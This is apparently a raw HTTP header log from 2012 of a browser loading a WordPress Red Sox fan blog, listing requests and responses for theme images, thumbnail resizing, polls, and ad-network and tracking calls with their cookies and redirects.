User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 400 Bad Request

Content-Type: text/html
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
GET /wp-content/themes/editorial/functions/thumb.php?src=wp-content/uploads/2012/03/vote2.jpg&w=291&h=120&zc=1&q=90 HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=wp-content/uploads/2012/03/vote2.jpg&amp;w=291&amp;h=120&amp;zc=1&amp;q=90 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Accept-Ranges: none
Cache-Control: max-age=864000, must-revalidate
Expires: Thu, 15 Nov 2012 17:00:36 GMT
Last-Modified: Mon, 05 Nov 2012 17:00:36 GMT
Content-Length: 8266
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wp-content/themes/editorial/functions/thumb.php?src=http://farm1.staticflickr.com/6/4552478035_827d7e6af1_z.jpg&w=291&h=120&zc=1&q=90&a=t HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=http://farm1.staticflickr.com/6/4552478035_827d7e6af1_z.jpg&amp;w=291&amp;h=120&amp;zc=1&amp;q=90&amp;a=t HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Accept-Ranges: none
Cache-Control: max-age=864000, must-revalidate
Expires: Thu, 15 Nov 2012 17:00:36 GMT
Last-Modified: Mon, 05 Nov 2012 17:00:36 GMT
Content-Length: 10713
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wp-content/themes/editorial/images/loading-slider.gif HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/wp-content/themes/editorial/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:05:01 GMT
Etag: &quot;3562102-c88-4bc418546e5cd&quot;
Accept-Ranges: bytes
Content-Length: 3208
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /pagead/expansion_embed.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 2372832783343406230
Date: Mon, 05 Nov 2012 01:11:01 GMT
Expires: Tue, 06 Nov 2012 01:11:01 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 25450
X-XSS-Protection: 1; mode=block
Age: 56975
Cache-Control: public, max-age=86400
GET /wp-content/plugins/wp-polls/images/loading.gif HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Last-Modified: Tue, 12 Jun 2012 14:57:31 GMT
Etag: &quot;16766f0-303-4c247af9a7734&quot;
Accept-Ranges: bytes
Content-Length: 771
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /wp-content/themes/editorial/functions/thumb.php?src=http://lh5.ggpht.com/-90zm3j0Aas4/T-u9QLB1--I/AAAAAAAAAnA/--UMQvMVWZo/Flickr-5662864333.jpg&w=291&h=120&zc=1&q=90 HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=http://lh5.ggpht.com/-90zm3j0Aas4/T-u9QLB1--I/AAAAAAAAAnA/--UMQvMVWZo/Flickr-5662864333.jpg&amp;w=291&amp;h=120&amp;zc=1&amp;q=90 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Accept-Ranges: none
Cache-Control: max-age=864000, must-revalidate
Expires: Thu, 15 Nov 2012 17:00:36 GMT
Last-Modified: Mon, 05 Nov 2012 17:00:36 GMT
Content-Length: 9477
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /www/delivery/lg.php?bannerid=14171&campaignid=232&cids=232&bids=14171&zoneid=153334&tid=153334_13521348357770db92221bcae&loc=http%3A%2F%2Ffirebrandal.com%2F&cb=1cce5bf923 HTTP/1.1

Host: vap5iad3.lijit.com
GET /www/delivery/lg.php?bannerid=14171&amp;campaignid=232&amp;cids=232&amp;bids=14171&amp;zoneid=153334&amp;tid=153334_13521348357770db92221bcae&amp;loc=http%3A%2F%2Ffirebrandal.com%2F&amp;cb=1cce5bf923 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: ljt_reader=81ff488f479bafaccad126c81dc2cbca
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljt_reader=81ff488f479bafaccad126c81dc2cbca; expires=Tue, 05-Nov-2013 17:00:36 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
GET /wp-content/themes/editorial/includes/js/general.js?ver=1.0.0 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:06:06 GMT
Etag: &quot;4c0853d-2818-4bc41891fb79d&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2362
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /wp-content/uploads/2012/02/bg2a.png HTTP/1.1

Host: www.firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:10:05 GMT
Etag: &quot;1af203-15471-4bc419767770d&quot;
Accept-Ranges: bytes
Content-Length: 87153
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wp-content/themes/editorial/images/ico-readmore.png HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/wp-content/themes/editorial/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:04:56 GMT
Etag: &quot;59cf563-f8-4bc4184efedd8&quot;
Accept-Ranges: bytes
Content-Length: 248
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wp-content/themes/editorial/images/ico-recent-news-filter-active.png HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/wp-content/themes/editorial/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:04:56 GMT
Etag: &quot;59cf564-a0-4bc4184f45a5c&quot;
Accept-Ranges: bytes
Content-Length: 160
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /wp-content/themes/editorial/images/ico-comments.png HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/wp-content/themes/editorial/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:04:52 GMT
Etag: &quot;5ed15fc-227-4bc4184b73f46&quot;
Accept-Ranges: bytes
Content-Length: 551
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /tiqiq/images/tiqiq-power.png HTTP/1.1

Host: images.tiqiq.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/png
Cache-Control: no-cache
Last-Modified: Tue, 07 Aug 2012 15:09:12 GMT
Accept-Ranges: bytes
Etag: &quot;54e5fb99ae74cd1:0&quot;
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 05 Nov 2012 17:00:32 GMT
Content-Length: 987
GET /adserver/www/delivery/ajs.php?zoneid=6110&cb=2301092746&charset=UTF-8&loc=http%3A//firebrandal.com/&tzo=-60&target=_blank&bw=1176&bh=778 HTTP/1.1

Host: delivery.switchadhub.com
GET /adserver/www/delivery/ajs.php?zoneid=6110&amp;cb=2301092746&amp;charset=UTF-8&amp;loc=http%3A//firebrandal.com/&amp;tzo=-60&amp;target=_blank&amp;bw=1176&amp;bh=778 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.0 200 OK

Content-Type: text/javascript; charset=UTF-8
X-Powered-By: PHP/5.3.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: OAID=7b0c8f7c48610ccc2add5a20ebb44c8a; expires=Tue, 05-Nov-2013 17:00:36 GMT; path=/
Content-Length: 1403
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: lighttpd/1.4.26
Connection: close
GET /wp-content/plugins/wp-polls/polls-js.js?ver=2.63 HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Last-Modified: Tue, 12 Jun 2012 14:57:31 GMT
Etag: &quot;55ed443-e0e-4c247af9cfb98&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 658
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /jscripts/widget.aspx HTTP/1.1

Host: www.tiqiq.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 05 Nov 2012 17:00:32 GMT
GET /profile_images/2291111656/v60536pciugvr39h0p1e_normal.jpeg HTTP/1.1

Host: a0.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
x-amz-id-2: kJUG0H0b54rWTfFU8FeNGuAmiTz+cU/dUakAA+iCBW2k0c2H7npXfbknRIe5gBhe
x-amz-request-id: 80CD442501EEDD9F
Date: Mon, 05 Nov 2012 17:00:36 GMT
Last-Modified: Sat, 09 Jun 2012 00:35:36 GMT
Etag: &quot;a1d97788446db9925d098c6c0e36acf4&quot;
Accept-Ranges: bytes
Content-Length: 4173
Server: AmazonS3
Cache-Control: private, max-age=604800
Age: 0
Expires: Mon, 12 Nov 2012 17:00:36 GMT
Connection: Keep-Alive
GET /i/partners/nav/espnBoston.gif HTTP/1.1

Host: a.espncdn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://sports.espn.go.com/mlb/sweetspot/nav?site=firebrand
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Tue, 06 Apr 2010 16:33:00 GMT
Content-Length: 1368
Accept-Ranges: bytes
P3P: CP=&quot;CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE&quot;
Cache-Control: max-age=1117446
Date: Mon, 05 Nov 2012 17:00:37 GMT
Connection: keep-alive
GET /i/nba/truehoops/espnsearch.gif HTTP/1.1

Host: a.espncdn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://sports.espn.go.com/mlb/sweetspot/nav?site=firebrand
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Thu, 11 Dec 2008 23:09:32 GMT
Content-Length: 809
Accept-Ranges: bytes
P3P: CP=&quot;CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE&quot;
Cache-Control: max-age=1281234
Date: Mon, 05 Nov 2012 17:00:37 GMT
Connection: keep-alive
GET /clients/redsox/wp-content/uploads/2012/03/alv.jpg HTTP/1.1

Host: www.krauppinc.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Last-Modified: Thu, 22 Mar 2012 21:39:50 GMT
Etag: &quot;5390d8-77c8-4bbdbbf62d580&quot;
Accept-Ranges: bytes
Content-Length: 30664
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /pagead/osd.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
If-None-Match: 13350759849962699205
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 18259867682941507172
Date: Mon, 05 Nov 2012 16:08:45 GMT
Expires: Mon, 05 Nov 2012 17:08:45 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 5981
X-XSS-Protection: 1; mode=block
Age: 3112
Cache-Control: public, max-age=3600
GET /adserver/www/delivery/lg.php?bannerid=6355&campaignid=1822&zoneid=6110&OACBLOCK=86400&OACCAP=2&loc=http%3A%2F%2Ffirebrandal.com%2F&cb=1e4683455b&tc=1352134836.9167 HTTP/1.1

Host: delivery.switchadhub.com
GET /adserver/www/delivery/lg.php?bannerid=6355&amp;campaignid=1822&amp;zoneid=6110&amp;OACBLOCK=86400&amp;OACCAP=2&amp;loc=http%3A%2F%2Ffirebrandal.com%2F&amp;cb=1e4683455b&amp;tc=1352134836.9167 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: OAID=7b0c8f7c48610ccc2add5a20ebb44c8a
HTTP/1.0 302 Found

Content-Type: text/html
X-Powered-By: PHP/5.3.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: OAID=7b0c8f7c48610ccc2add5a20ebb44c8a; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/ _OACCAP[1822]=1; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/ _OACBLOCK[1822]=1352134837; expires=Wed, 05-Dec-2012 17:00:37 GMT; path=/
Location: http://delivery.switchadhub.com/adserver/dsy.php?from=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver&amp;oaid=7b0c8f7c48610ccc2add5a20ebb44c8a&amp;store=1&amp;status=1&amp;mid=0
Content-Length: 0
Date: Mon, 05 Nov 2012 17:00:37 GMT
Server: lighttpd/1.4.26
Connection: close
GET /adserver/www/delivery/ag.php HTTP/1.1

Host: delivery.switchadhub.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: OAID=7b0c8f7c48610ccc2add5a20ebb44c8a
HTTP/1.0 200 OK

Content-Type: application/x-javascript
X-Powered-By: PHP/5.3.6
Content-Size: 3295
Expires: Tue, 06 Nov 2012 17:00:37 +0000
Content-Length: 3295
Date: Mon, 05 Nov 2012 17:00:37 GMT
Server: lighttpd/1.4.26
Connection: close
GET /adserver/dsy.php?from=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver&oaid=7b0c8f7c48610ccc2add5a20ebb44c8a&store=1&status=1&mid=0 HTTP/1.1

Host: delivery.switchadhub.com
GET /adserver/dsy.php?from=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver&amp;oaid=7b0c8f7c48610ccc2add5a20ebb44c8a&amp;store=1&amp;status=1&amp;mid=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: OAID=7b0c8f7c48610ccc2add5a20ebb44c8a; _OACCAP[1822]=1; _OACBLOCK[1822]=1352134837
HTTP/1.0 302 Found

Content-Type: text/html
X-Powered-By: PHP/5.3.6
Set-Cookie: _OACBLOCK[1822]=deleted; expires=Sun, 06-Nov-2011 17:00:36 GMT; path=/ %5FOACBLOCK%5B1822%5D=deleted; expires=Sun, 06-Nov-2011 17:00:36 GMT; path=/ _OACCAP[1822]=deleted; expires=Sun, 06-Nov-2011 17:00:36 GMT; path=/ %5FOACCAP%5B1822%5D=deleted; expires=Sun, 06-Nov-2011 17:00:36 GMT; path=/ SWID=7b0c8f7c48610ccc2add5a20ebb44c8a; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/ OACBLOCK=1822.1352134837; expires=Wed, 05-Dec-2012 17:00:37 GMT; path=/ OACCAP=1822.1; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/ OACBLOCK=1822.1352134837; expires=Wed, 05-Dec-2012 17:00:37 GMT; path=/ OACCAP=1822.1; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://tag.admeld.com/id?redirect=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%2Fdsy.php%3Fidx%3D65151e6%26ret%3D%5Badmeld_user_id%5D%26mid%3D0%26override%3D0%26store%3D1%26status%3D1%26from%3Dhttp%3A%2F%2Fdelivery.switchadhub.com%2Fadserver%26swid%3D7b0c8f7c48610ccc2add5a20ebb44c8a
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Content-Length: 0
Date: Mon, 05 Nov 2012 17:00:37 GMT
Server: lighttpd/1.4.26
Connection: close
GET /adserver/www/delivery/lg.php?bannerid=6355&campaignid=1822&zoneid=6110&OACBLOCK=86400&OACCAP=2&loc=http%3A%2F%2Ffirebrandal.com%2F&cb=1e4683455b&tc=1352134836.9167 HTTP/1.1

Host: delivery.switchadhub.com
GET /adserver/www/delivery/lg.php?bannerid=6355&amp;campaignid=1822&amp;zoneid=6110&amp;OACBLOCK=86400&amp;OACCAP=2&amp;loc=http%3A%2F%2Ffirebrandal.com%2F&amp;cb=1e4683455b&amp;tc=1352134836.9167 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: OAID=7b0c8f7c48610ccc2add5a20ebb44c8a; _OACCAP[1822]=1; _OACBLOCK[1822]=1352134837
HTTP/1.0 302 Found

Content-Type: text/html
X-Powered-By: PHP/5.3.6
Set-Cookie: _OACBLOCK[1822]=deleted; expires=Sun, 06-Nov-2011 17:00:36 GMT; path=/ %5FOACBLOCK%5B1822%5D=deleted; expires=Sun, 06-Nov-2011 17:00:36 GMT; path=/ _OACCAP[1822]=deleted; expires=Sun, 06-Nov-2011 17:00:36 GMT; path=/ %5FOACCAP%5B1822%5D=deleted; expires=Sun, 06-Nov-2011 17:00:36 GMT; path=/ OAID=7b0c8f7c48610ccc2add5a20ebb44c8a; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/ _OACCAP[1822]=1; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/ _OACBLOCK[1822]=1352134837; expires=Wed, 05-Dec-2012 17:00:37 GMT; path=/ OACBLOCK=1822.1352134837; expires=Wed, 05-Dec-2012 17:00:37 GMT; path=/ OACCAP=1822.1; expires=Tue, 05-Nov-2013 17:00:37 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://delivery.switchadhub.com/adserver/dsy.php?from=http%3A%2F%2Fdelivery.switchadhub.com%2Fadserver&amp;oaid=7b0c8f7c48610ccc2add5a20ebb44c8a&amp;store=1&amp;status=1&amp;mid=0
Content-Length: 0
Date: Mon, 05 Nov 2012 17:00:37 GMT
Server: lighttpd/1.4.26
Connection: close
GET /connect/xd_arbiter.php?version=12 HTTP/1.1

Host: static.ak.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
